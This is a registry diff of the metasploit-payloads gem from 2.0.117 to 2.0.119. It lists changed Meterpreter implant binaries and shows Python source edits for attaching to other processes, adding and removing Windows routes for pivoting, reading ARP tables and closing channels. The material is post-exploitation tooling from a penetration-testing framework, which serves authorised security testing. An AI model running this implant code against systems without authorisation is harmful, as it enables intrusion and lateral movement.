metasploit-payloads 2.0.117 → 2.0.119
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- checksums.yaml.gz.sig +0 -0
- data/data/android/meterpreter.jar +0 -0
- data/data/android/metstage.jar +0 -0
- data/data/android/shell.jar +0 -0
- data/data/meterpreter/elevator.x64.debug.dll +0 -0
- data/data/meterpreter/elevator.x64.dll +0 -0
- data/data/meterpreter/elevator.x86.debug.dll +0 -0
- data/data/meterpreter/elevator.x86.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x64.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_espia.x86.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x64.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_priv.x86.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x64.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_python.x86.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
- data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.py +108 -13
- data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
- data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
- data/data/meterpreter/meterpreter.py +27 -25
- data/data/meterpreter/metsrv.x64.debug.dll +0 -0
- data/data/meterpreter/metsrv.x64.dll +0 -0
- data/data/meterpreter/metsrv.x86.debug.dll +0 -0
- data/data/meterpreter/metsrv.x86.dll +0 -0
- data/data/meterpreter/screenshot.x64.debug.dll +0 -0
- data/data/meterpreter/screenshot.x64.dll +0 -0
- data/data/meterpreter/screenshot.x86.debug.dll +0 -0
- data/data/meterpreter/screenshot.x86.dll +0 -0
- data/lib/metasploit-payloads/version.rb +1 -1
- data.tar.gz.sig +0 -0
- metadata +2 -2
- metadata.gz.sig +0 -0
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: b67e513ed92128da0555d06d5700100438229971a8750aefac72059efec74eb8
|
|
4
|
+
data.tar.gz: 90a3af70071ac13b8b29db40a47868c5221361e14ad21aec997d1cfb52634d03
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: c961adbd35fd2999240f21e45383fa2ebd11edae361b65858361989ca32decc61d79b0259dcc0892ec65d714baed184f00d16499a6c4d5454599d268511c90ae
|
|
7
|
+
data.tar.gz: 7d90eebd468b2f28d536d395e62a29a4f1f342a72fa7141f2c4816887331e7cd5cea21906f8c717fb2b056f09fe316091171ba64170c728f87e7086773e7e95c
|
checksums.yaml.gz.sig
CHANGED
|
Binary file
|
|
Binary file
|
data/data/android/metstage.jar
CHANGED
|
Binary file
|
data/data/android/shell.jar
CHANGED
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
@@ -1002,6 +1002,9 @@ def getaddrinfo_from_request(request, socktype, proto):
|
|
|
1002
1002
|
local_address_info = None
|
|
1003
1003
|
return peer_address_info, local_address_info
|
|
1004
1004
|
|
|
1005
|
+
def addr_atoi4(address):
|
|
1006
|
+
return struct.unpack('!I', socket.inet_aton(address))[0]
|
|
1007
|
+
|
|
1005
1008
|
def netlink_request(req_type, req_data):
|
|
1006
1009
|
# See RFC 3549
|
|
1007
1010
|
NLM_F_REQUEST = 0x0001
|
|
@@ -1336,6 +1339,28 @@ def stdapi_sys_config_sysinfo(request, response):
|
|
|
1336
1339
|
response += tlv_pack(TLV_TYPE_ARCHITECTURE, get_system_arch())
|
|
1337
1340
|
return ERROR_SUCCESS, response
|
|
1338
1341
|
|
|
1342
|
+
@register_function_if(has_windll)
|
|
1343
|
+
def stdapi_sys_process_attach(request, response):
|
|
1344
|
+
pid = packet_get_tlv(request, TLV_TYPE_PID)['value']
|
|
1345
|
+
if not pid:
|
|
1346
|
+
GetCurrentProcess = ctypes.windll.kernel32.GetCurrentProcess
|
|
1347
|
+
GetCurrentProcess.restype = ctypes.c_void_p
|
|
1348
|
+
handle = GetCurrentProcess()
|
|
1349
|
+
else:
|
|
1350
|
+
inherit = packet_get_tlv(request, TLV_TYPE_INHERIT)['value']
|
|
1351
|
+
permissions = packet_get_tlv(request, TLV_TYPE_PROCESS_PERMS)['value']
|
|
1352
|
+
|
|
1353
|
+
OpenProcess = ctypes.windll.kernel32.OpenProcess
|
|
1354
|
+
OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_bool, ctypes.c_uint32]
|
|
1355
|
+
OpenProcess.restype = ctypes.c_void_p
|
|
1356
|
+
handle = OpenProcess(permissions, inherit, pid)
|
|
1357
|
+
if not handle:
|
|
1358
|
+
return error_result_windows(), response
|
|
1359
|
+
meterpreter.processes[handle] = None
|
|
1360
|
+
debug_print('[*] added process id: ' + str(pid) + ', handle: ' + str(handle))
|
|
1361
|
+
response += tlv_pack(TLV_TYPE_HANDLE, handle)
|
|
1362
|
+
return ERROR_SUCCESS, response
|
|
1363
|
+
|
|
1339
1364
|
@register_function
|
|
1340
1365
|
def stdapi_sys_process_close(request, response):
|
|
1341
1366
|
proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)['value']
|
|
@@ -1901,19 +1926,22 @@ def stdapi_net_config_get_arp_table(request, response):
|
|
|
1901
1926
|
if not os.path.exists(arp_cache_file):
|
|
1902
1927
|
return ERROR_NOT_SUPPORTED, response
|
|
1903
1928
|
|
|
1904
|
-
|
|
1905
|
-
|
|
1906
|
-
|
|
1907
|
-
|
|
1908
|
-
|
|
1909
|
-
|
|
1910
|
-
|
|
1911
|
-
|
|
1912
|
-
|
|
1913
|
-
|
|
1914
|
-
|
|
1915
|
-
|
|
1916
|
-
|
|
1929
|
+
arp_cache = open('/proc/net/arp', 'r')
|
|
1930
|
+
lines = arp_cache.readlines()
|
|
1931
|
+
for line in lines[1:]:
|
|
1932
|
+
fields = line.split()
|
|
1933
|
+
ip_address = fields[0]
|
|
1934
|
+
mac_address = fields[3]
|
|
1935
|
+
mac_address = bytes().join(binascii.unhexlify(h) for h in mac_address.split(':'))
|
|
1936
|
+
interface_name = fields[5]
|
|
1937
|
+
arp_tlv = bytes()
|
|
1938
|
+
arp_tlv += tlv_pack(TLV_TYPE_IP, socket.inet_aton(ip_address))
|
|
1939
|
+
arp_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, mac_address)
|
|
1940
|
+
arp_tlv += tlv_pack(TLV_TYPE_MAC_NAME, interface_name)
|
|
1941
|
+
response += tlv_pack(TLV_TYPE_ARP_ENTRY, arp_tlv)
|
|
1942
|
+
arp_cache.close()
|
|
1943
|
+
else:
|
|
1944
|
+
return ERROR_NOT_SUPPORTED, response
|
|
1917
1945
|
return ERROR_SUCCESS, response
|
|
1918
1946
|
|
|
1919
1947
|
@register_function
|
|
@@ -2124,6 +2152,73 @@ def stdapi_net_config_get_routes(request, response):
|
|
|
2124
2152
|
response += tlv_pack(TLV_TYPE_NETWORK_ROUTE, route_tlv)
|
|
2125
2153
|
return ERROR_SUCCESS, response
|
|
2126
2154
|
|
|
2155
|
+
def _win_route_add_remove(is_add, request, response):
|
|
2156
|
+
class IPAddr(ctypes.Structure):
|
|
2157
|
+
_fields_ = [
|
|
2158
|
+
("S_addr", ctypes.c_ulong)]
|
|
2159
|
+
|
|
2160
|
+
MIB_IPROUTE_TYPE_INDIRECT = 4
|
|
2161
|
+
MIB_IPPROTO_NETMGMT = 3
|
|
2162
|
+
|
|
2163
|
+
GetBestInterface = ctypes.windll.Iphlpapi.GetBestInterface
|
|
2164
|
+
GetBestInterface.argtypes = [IPAddr, ctypes.POINTER(ctypes.c_ulong)]
|
|
2165
|
+
GetBestInterface.restype = ctypes.c_ulong
|
|
2166
|
+
|
|
2167
|
+
CreateIpForwardEntry = ctypes.windll.Iphlpapi.CreateIpForwardEntry
|
|
2168
|
+
CreateIpForwardEntry.argtypes = [PMIB_IPFORWARDROW]
|
|
2169
|
+
CreateIpForwardEntry.restype = ctypes.c_ulong
|
|
2170
|
+
|
|
2171
|
+
DeleteIpForwardEntry = ctypes.windll.Iphlpapi.DeleteIpForwardEntry
|
|
2172
|
+
DeleteIpForwardEntry.argtypes = [PMIB_IPFORWARDROW]
|
|
2173
|
+
DeleteIpForwardEntry.restype = ctypes.c_ulong
|
|
2174
|
+
|
|
2175
|
+
GetIpInterfaceEntry = ctypes.windll.Iphlpapi.GetIpInterfaceEntry
|
|
2176
|
+
GetIpInterfaceEntry.argtypes = [ctypes.POINTER(MIB_IPINTERFACE_ROW)]
|
|
2177
|
+
GetIpInterfaceEntry.restype = ctypes.c_ulong
|
|
2178
|
+
|
|
2179
|
+
subnet = packet_get_tlv(request, TLV_TYPE_SUBNET_STRING)['value']
|
|
2180
|
+
netmask = packet_get_tlv(request, TLV_TYPE_NETMASK_STRING)['value']
|
|
2181
|
+
gateway = packet_get_tlv(request, TLV_TYPE_GATEWAY_STRING)['value']
|
|
2182
|
+
|
|
2183
|
+
route = MIB_IPFORWARDROW()
|
|
2184
|
+
route.dwForwardDest = socket.ntohl(addr_atoi4(subnet))
|
|
2185
|
+
route.dwForwardMask = socket.ntohl(addr_atoi4(netmask))
|
|
2186
|
+
route.dwForwardNextHop = socket.ntohl(addr_atoi4(gateway))
|
|
2187
|
+
route.dwForwardType = MIB_IPROUTE_TYPE_INDIRECT
|
|
2188
|
+
route.dwForwardProto = MIB_IPPROTO_NETMGMT
|
|
2189
|
+
route.dwForwardAge = -1
|
|
2190
|
+
route.dwForwardMetric1 = 0
|
|
2191
|
+
|
|
2192
|
+
best_iface = ctypes.c_ulong()
|
|
2193
|
+
ip_addr = IPAddr(socket.ntohl(addr_atoi4(subnet)))
|
|
2194
|
+
result = GetBestInterface(ip_addr, ctypes.byref(best_iface))
|
|
2195
|
+
if result != ERROR_SUCCESS:
|
|
2196
|
+
return error_result_windows(result), response
|
|
2197
|
+
route.dwForwardIfIndex = best_iface
|
|
2198
|
+
|
|
2199
|
+
iface = MIB_IPINTERFACE_ROW(Family=WIN_AF_INET, InterfaceIndex=route.dwForwardIfIndex)
|
|
2200
|
+
result = GetIpInterfaceEntry(ctypes.byref(iface))
|
|
2201
|
+
if result != ERROR_SUCCESS:
|
|
2202
|
+
return error_result_windows(result), response
|
|
2203
|
+
route.dwForwardMetric1 = iface.Metric
|
|
2204
|
+
|
|
2205
|
+
if is_add:
|
|
2206
|
+
result = CreateIpForwardEntry(ctypes.byref(route))
|
|
2207
|
+
else:
|
|
2208
|
+
result = DeleteIpForwardEntry(ctypes.byref(route))
|
|
2209
|
+
if result != ERROR_SUCCESS:
|
|
2210
|
+
return error_result_windows(result), response
|
|
2211
|
+
|
|
2212
|
+
return ERROR_SUCCESS, response
|
|
2213
|
+
|
|
2214
|
+
@register_function_if(has_windll)
|
|
2215
|
+
def stdapi_net_config_add_route(request, response):
|
|
2216
|
+
return _win_route_add_remove(True, request, response)
|
|
2217
|
+
|
|
2218
|
+
@register_function_if(has_windll)
|
|
2219
|
+
def stdapi_net_config_remove_route(request, response):
|
|
2220
|
+
return _win_route_add_remove(False, request, response)
|
|
2221
|
+
|
|
2127
2222
|
def stdapi_net_config_get_routes_via_netlink():
|
|
2128
2223
|
rta_align = lambda l: l+3 & ~3
|
|
2129
2224
|
responses = netlink_request(RTM_GETROUTE, RTMSG(family=socket.AF_UNSPEC))
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
@@ -1259,6 +1259,21 @@ class PythonMeterpreter(object):
|
|
|
1259
1259
|
self.next_channel_id += 1
|
|
1260
1260
|
return idx
|
|
1261
1261
|
|
|
1262
|
+
def close_channel(self, channel_id):
|
|
1263
|
+
if channel_id not in self.channels:
|
|
1264
|
+
return False
|
|
1265
|
+
channel = self.channels[channel_id]
|
|
1266
|
+
try:
|
|
1267
|
+
channel.close()
|
|
1268
|
+
except Exception:
|
|
1269
|
+
debug_traceback('[-] failed to close channel id: ' + str(channel_id))
|
|
1270
|
+
return False
|
|
1271
|
+
del self.channels[channel_id]
|
|
1272
|
+
if channel_id in self.interact_channels:
|
|
1273
|
+
self.interact_channels.remove(channel_id)
|
|
1274
|
+
debug_print('[*] closed and removed channel id: ' + str(channel_id))
|
|
1275
|
+
return True
|
|
1276
|
+
|
|
1262
1277
|
def add_process(self, process):
|
|
1263
1278
|
if has_windll:
|
|
1264
1279
|
PROCESS_ALL_ACCESS = 0x1fffff
|
|
@@ -1274,37 +1289,24 @@ class PythonMeterpreter(object):
|
|
|
1274
1289
|
return handle
|
|
1275
1290
|
|
|
1276
1291
|
def close_process(self, proc_h_id):
|
|
1277
|
-
|
|
1278
|
-
if not proc_h:
|
|
1292
|
+
if proc_h_id not in self.processes:
|
|
1279
1293
|
return False
|
|
1280
|
-
|
|
1281
|
-
|
|
1282
|
-
|
|
1283
|
-
|
|
1284
|
-
|
|
1285
|
-
|
|
1286
|
-
|
|
1294
|
+
proc_h = self.processes.pop(proc_h_id)
|
|
1295
|
+
if proc_h:
|
|
1296
|
+
# proc_h is only set when we started the process via execute and not when we attached to it
|
|
1297
|
+
for channel_id, channel in self.channels.items():
|
|
1298
|
+
if not isinstance(channel, MeterpreterProcess):
|
|
1299
|
+
continue
|
|
1300
|
+
if not channel.proc_h is proc_h:
|
|
1301
|
+
continue
|
|
1302
|
+
self.close_channel(channel_id)
|
|
1303
|
+
break
|
|
1287
1304
|
if has_windll:
|
|
1288
1305
|
CloseHandle = ctypes.windll.kernel32.CloseHandle
|
|
1289
1306
|
CloseHandle.argtypes = [ctypes.c_void_p]
|
|
1290
1307
|
CloseHandle.restype = ctypes.c_long
|
|
1291
1308
|
CloseHandle(proc_h_id)
|
|
1292
|
-
debug_print('[*] closed and removed process
|
|
1293
|
-
return True
|
|
1294
|
-
|
|
1295
|
-
def close_channel(self, channel_id):
|
|
1296
|
-
if channel_id not in self.channels:
|
|
1297
|
-
return False
|
|
1298
|
-
channel = self.channels[channel_id]
|
|
1299
|
-
try:
|
|
1300
|
-
channel.close()
|
|
1301
|
-
except Exception:
|
|
1302
|
-
debug_traceback('[-] failed to close channel id: ' + str(channel_id))
|
|
1303
|
-
return False
|
|
1304
|
-
del self.channels[channel_id]
|
|
1305
|
-
if channel_id in self.interact_channels:
|
|
1306
|
-
self.interact_channels.remove(channel_id)
|
|
1307
|
-
debug_print('[*] closed and removed channel id: ' + str(channel_id))
|
|
1309
|
+
debug_print('[*] closed and removed process handle: ' + str(proc_h_id))
|
|
1308
1310
|
return True
|
|
1309
1311
|
|
|
1310
1312
|
def get_packet(self):
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
|
Binary file
|
data.tar.gz.sig
CHANGED
|
Binary file
|
metadata
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: metasploit-payloads
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 2.0.
|
|
4
|
+
version: 2.0.119
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- OJ Reeves
|
|
@@ -96,7 +96,7 @@ cert_chain:
|
|
|
96
96
|
EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
|
|
97
97
|
9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
|
|
98
98
|
-----END CERTIFICATE-----
|
|
99
|
-
date: 2023-03-
|
|
99
|
+
date: 2023-03-07 00:00:00.000000000 Z
|
|
100
100
|
dependencies:
|
|
101
101
|
- !ruby/object:Gem::Dependency
|
|
102
102
|
name: rake
|
metadata.gz.sig
CHANGED
|
Binary file
|